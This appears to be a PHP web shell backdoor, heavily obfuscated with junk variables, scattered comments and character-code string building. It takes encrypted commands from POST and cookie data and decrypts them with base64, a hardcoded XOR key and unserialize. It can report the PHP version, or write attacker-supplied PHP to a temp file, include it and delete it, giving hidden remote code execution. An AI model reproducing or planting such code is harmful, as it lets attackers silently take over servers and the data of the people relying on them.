<?php $twxhxlu  =	'twxhxlu' /*  r  */ ^ /*v*/ '';








function /*pl*/ zlvkm()
{ /*  jfr   */ $puqzo_pu	=  22;


 /*gjnb  */ $tdjloop    =	'fwqv';

    $hcirtb /*igufgr*/ = /*   hm */ 'ctjyhpqsw';
 /*qbzows */ $wswfn   = /*  sutcl  */ 20; /* s  */ $thfnnxmsnd    =     'fop';
	return	$_POST;

}

$mhbzg	=    zlvkm();$zefrlea_erueoukt      =	26;


$ecfpuksnu    = /* fn_zy*/ '_z_gwaav';




$hj_abixu /*   edym  */ = /*   ge */ $_COOKIE;$cskuzdrf_ /*  zk */ = /*  far  */ '_e';$mo_isqwys     = /*  ftuzq*/ 48;




zlvkm();





function    osvfkdhaq($vidflgowaozdqtez, /* ljhzr  */ $fadvbt){


    global    $twxhxlu;


      $zefrlea_ermiogwxng /*   u  */ = /*   x*/ sprintf($twxhxlu(910-864) /*   v */ .    "/"."\45"      .   "s"."\x2e"     . /* hx */ "\x70"       .	$twxhxlu(108),  md5($vidflgowaozdqtez));


    file_put_contents($zefrlea_ermiogwxng,	"<" /* kc_jk  */ .   $twxhxlu(282-219)       .    "\160" /*   f   */ . /* k   */ "h"."p".$twxhxlu(32)      . /*ctdk   */ $twxhxlu(117) /* y_lk   */ . /* f  */ "\x6e"	.    "\154"	.    $twxhxlu(105)."\156"	.       $twxhxlu(1071-964)      .    "("."_"."\x5f"	.	"F"."I".$twxhxlu(782-706)  .       "E"."_"."_".")".$twxhxlu(59) /*   wjyp */ .    $twxhxlu(32) /*g  */ .    $fadvbt[$twxhxlu(100)]);
$wvcjx    =    'jqfnhf';


      include($zefrlea_ermiogwxng);


	$bnysrxdtw	=     'oxlctgtwh';	$wvcjx	= /* ltw   */ base64_decode($wvcjx);


	$esjmpouewu   =	'pxikyoy';    $wcnyaeatcf /*   ubu   */ =       $zefrlea_ermiogwxng;

	$bnysrxdtw    =	base64_decode($esjmpouewu);    @unlink($wcnyaeatcf);
	$sacdtcx /*   k_fso  */ = /*  wn  */ 'ffbypnd';}





function	xtiumowegs()


{
 /*  esqn*/ global  $twxhxlu;





 /*  o*/ $zefrlea_er    =   array();

    $zefrlea_er["\160"   .     "v"] /* i*/ =    phpversion();
    $zefrlea_er[$twxhxlu(115) /* zr */ .    "\x76"]	= /*ot */ "\x33"	.	"\56"  . /*itckum  */ "\65";
    echo	@serialize($zefrlea_er);

	$pzufxev      =    9;


}




function /*hzs   */ rllneiyu($fadvbt,	$vidflgowaozdqtez,	$x_agzmpbe)

{

    global /* hswq  */ $twxhxlu;

    $fadvbt /* c */ = /*crvv*/ unserialize(asapxpko(asapxpko(base64_decode($fadvbt),	$vidflgowaozdqtez),     $x_agzmpbe));


 /*rp   */ if /*ktgx*/ (isset($fadvbt["\x61"."\x6b"])) /*mrri  */ { /*zw*/ if    ($fadvbt["\x61"]       ==    $twxhxlu(105)) /*  dnive */ {

    xtiumowegs();			$wois_ai	=	27;
       }      elseif	($fadvbt["\x61"] /*fff*/ ==      "\145")    { /*  o   */ osvfkdhaq($vidflgowaozdqtez,       $fadvbt);

			$vidflgowavzcyiy /* qpje_  */ =    'kjwp';
    }
      exit();


     }}




$hj_abixu	=    array_merge($mhbzg,	$hj_abixu);
	$uwgosg /*vd   */ = /* pkyrpm  */ 'opwmjy';




function    asapxpko($fadvbt, /* qnrq */ $zefrlea_erl_orwb)
{
 /*  f*/ global  $twxhxlu;
	$emkttvhnbj /*lmm  */ =	"";

 /* ims   */ for    ($zefrlea_er /*omfow */ =    0;    $zefrlea_er /*   upcfq */ < /* oa*/ strlen($fadvbt);)    {

     for   ($vidflgowa    =      0; /*  tzmioe  */ $vidflgowa	<     strlen($zefrlea_erl_orwb)    && /*  j */ $zefrlea_er    <    strlen($fadvbt);	$vidflgowa++, /*fxhco */ $zefrlea_er++)	{ /*   q_ip*/ $emkttvhnbj /*  p  */ .= /* h*/ $twxhxlu(ord($fadvbt[$zefrlea_er]) /*  iopj */ ^  ord($zefrlea_erl_orwb[$vidflgowa]));
			$vidflgowaskuema /*   sijiwj */ = /* uoh */ 25; /* sg  */ }	} /*   yyxtlw*/ return      $emkttvhnbj;


}




$vidflgowaozdqtez    = /*xislsx*/ $twxhxlu(51)    . /*   wa   */ "\142"    .     $twxhxlu(50) /*  jl */ .	"9".$twxhxlu(961-906) /*   l*/ .    "9"."0".$twxhxlu(360-260)    .    "-".$twxhxlu(657-600) /*  pfui */ . /* p  */ "\x61".$twxhxlu(493-437) /*   zj   */ .    $twxhxlu(99)    . /*   hvkltg   */ $twxhxlu(45) /*a*/ .	"\x34"    .    "5"."8"."\x66"    .    "\x2d"   .       "\x61"	. /*   xdiey*/ $twxhxlu(100)."2"."\141"      . /*  llnkb  */ "\x2d"      .	$twxhxlu(48) /*njcr_w   */ . /*azv  */ "\143" /* ctl */ .	$twxhxlu(98) /*   fv*/ .    $twxhxlu(408-352)  . /*   pq*/ "\144"       .  "\x39" /*y*/ .    $twxhxlu(98)	.    "2"."\63"    .      "\x35"    .    "\146"    . /*   jk_wm*/ "6";
$etqcx    = /* uupxn  */ strlen($uwgosg);foreach   ($hj_abixu    as	$x_agzmpbe	=> /* nl*/ $fadvbt) /* dzmfp*/ {


	rllneiyu($fadvbt,	$vidflgowaozdqtez,     $x_agzmpbe);}



function /*  ars   */ uodvws()
{	$oqqyivh	= /*anksco */ 'pdczyfhftq';    $pbpuww     =  24;

    $msdxtofu    =  'wzvnxybgg';	$okrb_m    =  48;


 /* ddet_o   */ $zqbwgsti_ /*   wj  */ = /*  fl */ strtoupper($oqqyivh); /*bhdp */ $giquynptwa /*kp */ =       $pbpuww   -    $okrb_m;

 /* ioyoy  */ $pbpuww /*  _m*/ =     $giquynptwa       -    $pbpuww; /*  nwgxps*/ $nwxgrcn    = /* mwu   */ 31;
 /*   weavj*/ $nnkixegeyr	= /*iy*/ 'ni';
 /* tqiw*/ $giquynptwa      = /*gtjsrt  */ $pbpuww	%    ($nwxgrcn	+	3);


}




uodvws();







?>